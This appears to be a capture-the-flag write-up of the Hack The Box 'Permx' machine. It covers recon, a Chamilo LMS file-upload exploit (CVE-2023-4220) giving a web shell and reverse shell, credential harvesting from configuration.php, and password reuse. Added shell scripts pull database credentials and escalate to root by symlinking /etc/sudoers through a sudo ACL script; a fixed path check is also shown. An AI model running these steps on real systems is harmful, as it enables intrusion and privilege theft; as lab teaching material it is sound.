Introduction to Permx:

In this write-up, we will explore the “Permx” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough covers the reconnaissance, exploitation, and privilege escalation steps required to capture both flags.
Objective:
The goal of this walkthrough is to complete the “Permx” machine from Hack The Box by achieving the following objectives:
User Flag:
CVE-2023-4220 Exploitation
- Identify the web technology that lets a single IP address serve multiple host names (Apache name-based virtual hosts) and enumerate to find the other host names.
- The target’s Apache server permits directory listing, which exposes the files in open directories. Check for robots.txt and explore the directories to identify the application and its version; the bundled documentation is also worth reviewing.
- Research CVEs associated with this web application, checking each CVE’s prerequisites against the version and configuration found on the server.
Root Flag:
Using ACL and Symlinks for Privilege Escalation:
- A script that we can run with sudo changes the ACL of a file, but only accepts paths inside the user mtz’s home directory, so on its face it lets us grant ourselves read, write, and execute permissions only on files under /home/mtz.
- The script checks where the supplied path sits, not what it resolves to, so the restriction can be bypassed with a symbolic link (symlink), which, like a Windows shortcut, is a pointer to another file or directory.
- This matters for the acl.sh script: we can create a symlink in /home/mtz pointing to any other file, and the script will grant read, write, and execute permissions on the link’s target.
- I tested this approach by creating a symlink to /etc/shadow and was able to view and edit its contents.
Enumerating the Permx Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine. The host name permx.htb is mapped to 10.10.11.23 in /etc/hosts, which is why nmap reports the target by name.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.23
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/Permx]
└──╼ $nmap -sV -sC 10.10.11.23 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 03:53 EDT
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: eLEARNING
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.74 seconds
Analysis:
- Port 22 (SSH): Secure remote access via OpenSSH 8.9p1 on Ubuntu.
- Port 80 (HTTP): Web server running Apache 2.4.52 serving eLEARNING.
Web Enumeration:
Perform virtual-host enumeration to discover the other host names served by this IP. Apache answers any Host header it does not recognise with its default site, so the interesting responses are the ones that differ from that default. Recent gobuster versions (3.2 and later) need --append-domain to append the base domain to each word, and permx.htb must already be mapped to 10.10.11.23 in /etc/hosts.
gobuster vhost -u http://permx.htb -w /usr/share/wordlists/dirb/common.txt --append-domain
Gobuster Output:

The output contains numerous entries, primarily with status 302, which is the default site redirecting unknown host names.

No entries were found with status 200.

Analysis:
- www: No new content found.
- lms: Hosts an instance of Chamilo LMS.
Exploitation
Web Application Exploration:

After exploring the main site, no interesting functionality was identified. A contact form is available, but it yielded nothing useful for further action.

The curl request and response for the main site did not provide any notable information either.

The lms subdomain will appear similar to what is shown above.

In the corner, there is a note indicating that the administrator for Chamilo is Davis Miller, with a link to his email: admin@permx.htb.

Enumerating directories on this subdomain turns up a /documentation directory, which is quite intriguing because it helps pin down the installed Chamilo version.

The documentation page will resemble the example depicted in the screenshot above.

I looked up recent vulnerabilities for Chamilo and found CVE-2023-4220, along with a proof of concept (PoC) for an unrestricted file upload. The PoC uploads a PHP web shell, which results in remote code execution (RCE).
Exploit for Chamilo LMS Unrestricted File Upload Vulnerability (CVE-2023-4220)
This exploit targets the unrestricted file upload in the large-file upload feature of Chamilo LMS, reachable without authentication at /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS 1.11.24 and earlier. The endpoint writes whatever is submitted, under its original file name, into the web-accessible /main/inc/lib/javascript/bigupload/files directory, so uploading a PHP web shell gives remote code execution.
To test the exploit, I used a Python PoC script found here and attempted to obtain a callback.

The upload directory already contains files left behind by other players, but let’s upload our own malicious file to the folder.

Let’s download the exploit script to our local machine.

Let’s run the Python script.

First, run python3 main.py -u <domain> -a scan, which checks whether the target is vulnerable and produces the output shown above.

Let’s upload the web shell to the victim’s machine.

The malicious file has been successfully uploaded to the application.

We now have command execution on the machine through the web shell.

Let’s send our reverse shell payload through the web shell.

We have successfully established a reverse shell connection back to our machine.


As the www-data user, I couldn’t access the user flag, so I began exploring the Chamilo files for any interesting details in the configuration files.
In /var/www/chamilo/cli-config.php, I discovered references to /app/config/configuration.php (under the Chamilo web root), which is where Chamilo keeps its database settings and is therefore likely to contain the SQL credentials.

I used the credentials to log into the local SQL database, which isn’t externally accessible. I explored the Chamilo database and found several tables, including a user table with password hashes, but couldn’t crack them or find any other valuable information.

Eventually, I returned to the host and discovered the user mtz.

I attempted to reuse the SQL password for mtz and was able to log in successfully.

We can view the user flag by executing the command cat user.txt.
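The post-exploitation steps above (pulling the database credentials out of Chamilo’s configuration.php, querying the user table, and trying the password against the human accounts on the host) as an added shell example; these are not the author’s commands. The key names db_host, db_user, db_password and main_database follow the $_configuration array used by Chamilo 1.11, the full path /var/www/chamilo/app/config/configuration.php and the username/password column names are assumptions, and the sample configuration and passwd lines are constructed here with made-up values, not the real ones from the box.

```shell
#!/bin/sh
# Added example (not the author's commands): harvest Chamilo DB credentials
# from configuration.php and check where they are reused.
# Assumption: the file sets values as $_configuration['key'] = 'value';
# (Chamilo 1.11 style). The sample data below is constructed for the demo.

# chamilo_conf_get FILE KEY -> value of $_configuration['KEY'] in FILE
chamilo_conf_get() {
    grep -F "_configuration['$2']" "$1" | head -n 1 \
        | sed "s/^[^=]*=[[:space:]]*'//; s/'.*//"
}

# login_users PASSWD_FILE -> non-system accounts with an interactive shell,
# i.e. the names worth trying a recovered password against over SSH
login_users() {
    awk -F: '$3 >= 1000 && $7 ~ /sh$/ { print $1 }' "$1"
}

# db_query CONF SQL -> run SQL against the local database with the harvested
# credentials (MySQL is only reachable from the box itself)
db_query() {
    conf=$1
    mysql -h "$(chamilo_conf_get "$conf" db_host)" \
          -u "$(chamilo_conf_get "$conf" db_user)" \
          -p"$(chamilo_conf_get "$conf" db_password)" \
          "$(chamilo_conf_get "$conf" main_database)" -e "$2"
}

# sample_config -> path to a constructed configuration.php (demo values only)
sample_config() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
<?php
// constructed sample, not the real file from the target
$_configuration['db_host'] = 'localhost';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = 'example-password-not-real';
$_configuration['main_database'] = 'chamilo';
EOF
    echo "$f"
}

# On the target, as www-data, the workflow is (paths/columns assumed):
#   conf=/var/www/chamilo/app/config/configuration.php
#   db_query "$conf" 'SELECT username, password FROM user;'   # hashes only
#   login_users /etc/passwd                                    # -> mtz
# then, from the attacking machine, try the db_password value:
#   ssh mtz@10.10.11.23
if [ -n "${CHAMILO_CONF:-}" ]; then
    echo "db_user=$(chamilo_conf_get "$CHAMILO_CONF" db_user)"
    echo "db_password=$(chamilo_conf_get "$CHAMILO_CONF" db_password)"
    login_users /etc/passwd
fi
```

The point of login_users is to shortlist reuse candidates: on this box the only non-system account with a shell is mtz, and the database password is what got us in over SSH, while the hashes in the user table were a dead end.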
Escalate to Root Privileges Access on Permx Machine
Privilege Escalation:

To look for a route to root, I checked my sudo privileges with sudo -l and noticed that I can execute /opt/acl.sh as root without a password.

The script takes a user, a permission set, and a target file as parameters and changes that file’s ACL, but it insists that the target path lies inside our home directory.

Let’s create a symbolic link to the sudoers file and use the script to grant ourselves read and write access through it.

After that, we can write to /etc/sudoers through the link and grant our user all privileges.

The privilege escalation comes down to abusing what the script does on our behalf. I researched the setfacl command and realised that it grants a named user permissions on a file, which means I can grant myself rwx permissions on a file through sudo /opt/acl.sh.
With this in mind, creating a symlink to a file like /etc/shadow lets me grant myself rwx permissions on that file, remove the password for the root account, and then switch to root to obtain the root flag.

We can view the root flag by executing the command cat root.txt.
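The symlink bypass and the fix for it, as an added shell example rather than the box’s real /opt/acl.sh, whose full source this write-up does not show. weak_guard is a hypothetical reconstruction of a path check that only looks at the string it is given; fixed_guard canonicalises the path first. escalate is the sequence from the write-up and is only meant to be run as mtz on the target; the link name sudoers_link is an assumption.

```shell
#!/bin/sh
# Added example: why a "target must be under /home/mtz" check is bypassed by
# a symlink, and what a sound check looks like. weak_guard is a hypothetical
# reconstruction, not the real /opt/acl.sh from the box.

ACL_HOME=${ACL_HOME:-/home/mtz}

# weak_guard TARGET -> accepts any existing regular file whose *name* starts
# with $ACL_HOME and contains no "..". test -f follows symlinks, and so does
# setfacl, so a link inside the home directory passes while the ACL lands on
# whatever the link points to.
weak_guard() {
    case "$1" in
        *..*) return 1 ;;
        "$ACL_HOME"/*) [ -f "$1" ] ;;
        *) return 1 ;;
    esac
}

# fixed_guard TARGET -> rejects symlinks outright and compares the canonical
# path (all links resolved, including in parent components) against the
# canonical home directory, so the ACL can only ever land inside it.
fixed_guard() {
    [ -L "$1" ] && return 1
    resolved=$(readlink -f -- "$1") || return 1
    home=$(readlink -f -- "$ACL_HOME") || return 1
    case "$resolved" in
        "$home"/*) [ -f "$resolved" ] ;;
        *) return 1 ;;
    esac
}

# escalate -> the sequence from the write-up; run as mtz on the target.
# After setfacl -m u:mtz:rw the ACL mask shows up in the group bits of ls -l
# (0440 becomes 0460). sudo refuses a sudoers file that is world-writable,
# but the ACL does not set that bit, and the write-up reports the file was
# still accepted. The same trick on /etc/shadow lets you blank root's hash.
escalate() {
    ln -s /etc/sudoers "$ACL_HOME/sudoers_link"
    sudo /opt/acl.sh mtz rw "$ACL_HOME/sudoers_link"
    getfacl /etc/sudoers                       # shows user:mtz:rw- and mask::rw-
    echo 'mtz ALL=(ALL) NOPASSWD: ALL' >> "$ACL_HOME/sudoers_link"
    sudo -l && sudo -i
}

if [ "${1:-}" = "escalate" ]; then escalate; fi
```

Two caveats for the fixed version. A hard link would pass a canonical-path check, because there is no link to resolve; Ubuntu’s default fs.protected_hardlinks=1 stops an unprivileged user from hard-linking a file they do not own, so that is covered by the kernel rather than the script. And the check and the setfacl call are still two separate steps, so a script like this should also refuse to run on anything it does not own, rather than trust the path alone.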